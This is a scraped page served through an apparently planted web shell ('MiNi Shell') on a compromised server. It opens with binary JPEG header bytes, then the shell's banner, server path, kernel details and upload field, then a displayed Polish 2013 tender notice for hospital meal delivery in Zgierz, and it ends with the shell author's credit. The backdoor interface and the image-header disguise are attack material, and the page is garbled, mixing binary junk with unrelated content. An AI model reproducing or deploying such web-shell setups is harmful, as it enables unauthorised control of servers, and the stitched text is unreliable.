JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131206/265129-N-2013.html

<p class="kh_header"><b>Zgierz: Dostawa i dystrybucja posiłków dla Centrum Medycznego BORUTA Sp. z o.o. w Zgierzu - II postępowanie</b><br>
<b>Numer ogłoszenia: 265129 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Medyczne Boruta Sp. z o.o. , ul. Andrzeja Struga 2-4, 95-100 Zgierz, woj. łódzkie, tel. 42 714 35 10, faks 42 714 35 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cm-boruta.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i dystrybucja posiłków dla Centrum Medycznego BORUTA Sp. z o.o. w Zgierzu - II postępowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Dostawa i dystrybucja posiłków. Całodzienne posiłki dla pacjentów Szpitala CMB, składające się ze śniadania, obiadu i kolacji przygotowane według wymaganych standardów jakościowych i żywieniowych (w tym posiłki dietetyczne) będą dostarczane do siedziby Zamawiającego i dystrybuowane w oddziale szpitalnym. 2. Szpital posiada dwa oddziały: Oddział Chorób Wewnętrznych oraz Oddział Geriatrii o łącznej bazie 40 łóżek rzeczywistych. Zamawiający wymaga zabezpieczenia maksymalnej ilości posiłków miesięcznie do 1200 szt. 3. Przygotowywanie posiłków odbywać się będzie z uwzględnieniem diet stosowanych w Szpitalu CMB zgodnie z aktualnymi zaleceniami lekarzy. Posiłki dla pacjentów winny być dostarczane w ściśle ustalonych porach dnia: a. śniadanie - godzina 7.30. b. obiad - godzina 12.30. c. kolacja - godzina 17.30. 
4. Dostarczane posiłki obejmować mają następujące przykładowe diety: a. dieta podstawowa - obejmuje pokarmy spożywane przez ludzi zdrowych. Stosuje się wszystkie procesy technologiczne potraw; b. dieta łatwo strawna; c. dieta papkowa; d. dieta niskobiałkowa; e. dieta bogatobiałkowa; 
f. cukrzycowa - 5 posiłków zmodyfikowanych zgodnie z wymaganiami przewidzianymi przy tym schorzeniu; g. żołądkowa; h. bezmleczna; i. kleik; j. niskokaloryczna; k. wysokokaloryczna; l. potrawy o charakterze tradycyjnym w okresie świąt Bożego Narodzenia i Wielkanocy. 6. Przyjęcie posiłków przez Zamawiającego: 6.1. Posiłki winny być dostarczane w termosach i pojemnikach GN 
w odpowiedniej konfiguracji. 6.2. Pojemniki transportowe powinny gwarantować szczelne zamknięcie posiłku i utrzymanie właściwej temperatury: 1) dla potraw serwowanych na zimno; niewymagających przechowywania w warunkach chłodniczych - od 20 C do 40C, 2) dla potraw serwowanych na gorąco: zupa. napoje gorące - temp. nie niższą niż 850C, 3) II danie temp. nie niższa niż 700C, 4) surówki. sałatki od 4 do l00C 6.3. Wykonawca jest zobowiązany do odbioru pojemników transportowych niezwłocznie po zakończeniu dystrybucji na oddziałach. 6.4. Do oferty należy załączyć instrukcję mycia i dezynfekcji pojemników transportowych z uwzględnieniem odpowiedniego środka dezynfekującego o szerokim spektrum działania (B,V,F, Tbc), zakwalifikowanego do kontaktu z powierzchniami mającymi kontakt z żywnością. Zamawiający ma prawo do kontroli zapisów z mycia i dezynfekcji w/w pojemników. 6.5. Pojemniki GN należy też oznakować godziną umieszczenia potrawy w pojemniku po zakończeniu procesu technologicznego. 6.6. Dostawa posiłków będzie kontrolowana przez upoważnionego pracownika Zamawiającego. 6.7. Kontrola będzie obejmowała m in.: 1) ocenę higieny środka transportu, opakowań, termosów, pojemników, GN. 2) ocenę higieny kierowcy, 3) ocenę organoleptyczną posiłków, 4) sprawdzenie zgodności dostawy z jadłospisem, 5) sprawdzenie temperatury posiłków w momencie dostarczenia do punktu odbioru. 6.8. Przedstawiciel Wykonawcy (kierowca dostarczający posiłki lub inna upoważniona osoba) jest zobowiązany do uczestnictwa w kontroli dostawy. 6.9. Łącznie z dostawą śniadania należy dostarczyć dzienny jadłospis w ilości 2 szt. 7 . Wymagania zamawiającego odnośnie planowania jadłospisów: 7.1. Wykonawca ma obowiązek sporządzić 7-dniowy jadłospis, który zostanie przedłożony Zamawiającemu do akceptacji na 4 dni przed rozpoczęciem jego realizacji. 7.2. Pracownik Zamawiającego ma prawo do wniesienia poprawek jadłospisie zaproponowanym jadłospisie w przypadku, gdy nie będzie on spełnia prawidłowego żywienia. W takim przypadku Wykonawca ma obowiązek przedłożenia nowej wersji jadłospisu, uwzględniającego zgłoszone poprawki. 7.3. Jadłospis musi zawierać wagę poszczególnych dań. 7.4. Posiłki należy przygotować z uwzględnieniem nowoczesnych zasad dietetyki. 7.5. Posiłki zaplanowane w jadłospisie muszą dostarczać odpowiedniej ilości energii i składników odżywczych. Zgodnie z normami żywienia dla chorych dorosłych w szpitalach muszą zawierać ilości produktów zalecanych w całodziennych normach żywienia. 7.6. W racjach pokarmowych. zalecanych przez Instytut Żywności i Żywienia średnia dzienna wartość energetyczna jadłospisu dekadowego dla diet w ogólnej nie powinna być mniejsza niż 2600 kcal. 7.7. Dostarczane posiłki muszą być świeże tj. z bieżącej produkcji dziennej. 7.8. Posiłki muszą być przygotowywane ze świeżych naturalnych produktów wysokiej jakości, niedopuszczalne jest przygotowywanie posiłków z koncentratów obiadowych w proszku oraz konserw. 7.9. Zamawiający zastrzega sobie prawo do oceny ilościowej i jakościowej jadłospisu. 7.10. W każdym posiłku w ciągu dnia powinien być uwzględniony produkt białkowy pochodzenia zwierzęcego np. ser, mięso i jego przetwory ryby, jaja, mleko i jego przetwory. 8. Wymagania Zamawiającego odnośnie personelu Wykonawcy, zatrudnionego przy realizacji i usługi: 8.1. Wykonawca Zobowiązany jest do załączenia do oferty informacji o osobie wyznaczonej i o bieżących kontaktów z Zamawiającym w trakcie realizacji i przedmiotu zamówienia i aktualizowania tej informacji w przypadku zmian personalnych podczas okresu realizacji umowy. Należy podać imię i nazwisko tej osoby oraz numer służbowego telefonu komórkowego. 8.2. Osoby, którymi dysponuje Wykonawca przy realizacji niniejszego zamówienia muszą posiadać stosowne kwalifikacje zawodowe oraz zezwolenia, które są wymagane przepisami prawa w odniesieniu do wykonywania czynności związanych z przygotowywaniem i dystrybucją posiłków. 8.3. Personel Wykonawcy pracujący przy produkcji i transporcie żywności musi być szkolony według opracowanego przez wykonawcę harmonogramu. 8.4. Personel Wykonawcy ma w obowiązku utrzymanie w czystości kuchenki oddziału i miejsca spożywania posiłków przez pacjentów. 9. Zakres obowiązków i odpowiedzialności Wykonawcy: 9.1. Wykonawca ponosi odpowiedzialność za jakość świadczonej usługi oraz jej wykonanie zgodnie z wszystkimi obowiązującymi w tym zakresie wszelkimi przepisami prawa żywnościowego. 
9.2. Wykonawca jest zobowiązany do załączenia do oferty decyzji właściwego powiatowego inspektora sanitarnego o zatwierdzeniu zakładu do produkcji żywności. Zatwierdzenie ma zawierać zezwolenie na realizację usługi w systemie cateringowym. 9.3. Wykonawca ponosi pełną odpowiedzialność cywilną i finansową za jakość dostarczanych posiłków oraz skutki wynikające z zaniedbań przy ich przygotowaniu i transporcie mogące negatywnie wpłynąć na zdrowie i życie pacjentów. 9.4. Wykonawca ma obowiązek przechowywać przez okres wymagany przez SSE próbki wszystkich potraw wchodzących w skład każdego posiłku. 9.5. Wykonawca jest zobowiązany do systematycznego monitorowania jakości usługi. 9.6. Wykonawca jest zobowiązany do zapewnienia ciągłości dostaw posiłków przez okres umowy bez względu na występujące awarie. 9.7. Wykonawca jest zobowiązany do zapewnienia pacjentom odpowiedniej ilości płynów między posiłkami, zgodnie ze zgłoszonym zapotrzebowaniem. 9.8. Wykonawca jest zobowiązany do zapewnienia zastawy stołowej i sztućców dla wszystkich pacjentów szpitala 9.9. Wykonawca jest zobowiązany do dostarczenia do kuchenki oddziałowej zmywarki z wyparzaczem do naczyń. 
9.10. W przypadku stosowania naczyń jednorazowych Wykonawca ponosi koszty utylizacji naczyń. 9.11. Wykonawca jest zobowiązany do codziennego odbioru resztek nie zjedzonych posiłków..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.32.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań i nie dokonuje opisu tych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań i nie dokonuje opisu tych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań i nie dokonuje opisu tych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań i nie dokonuje opisu tych warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych wymagań i nie dokonuje opisu tych warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz wykonanych w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw posiłków i ich dystrybucji z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie (z przedstawionych dokumentów powinno wynikać w sposób jednoznaczny, nie budzący jakichkolwiek wątpliwości Zamawiającego co do przedmiotu 
i wartości zrealizowanych dostaw , przy czym za spełniające powyższe wymagania zostaną uznane tylko te zamówienia, które rozpoczęto i zakończono w okresie przed upływałem terminu składania ofert - załącznik nr 5. Za dokumenty o których mowa w zdaniu poprzedzającym, a potwierdzające wykonania dostaw mogą być uznane w szczególności: protokół odbioru, kopia faktury. Dla wykazania należytego wykonania dostawy, niezależnie od udokumentowania samego faktu jej wykonania za wystarczające uznane być może oświadczenie odbiorcy o należytym wykonaniu lub inny dokument z treści którego wynika niezbicie fakt należytego wykonania dostawy przez wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cm-boruta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Medyczne BORUTA Sp. z o.o. w Zgierzu, ul. A. Struga 2-4, 95-100 Zgierz, Dział Administracyjno - Gospodarczy i Zamówień Publicznych - parter budynku szpitala.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 10:00, miejsce: Centrum Medyczne BORUTA Sp. z o.o. w Zgierzu, ul. A. Struga 2-4, 95-100 Zgierz, sekretariat Dyrektora, II piętro budynek przychodni.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com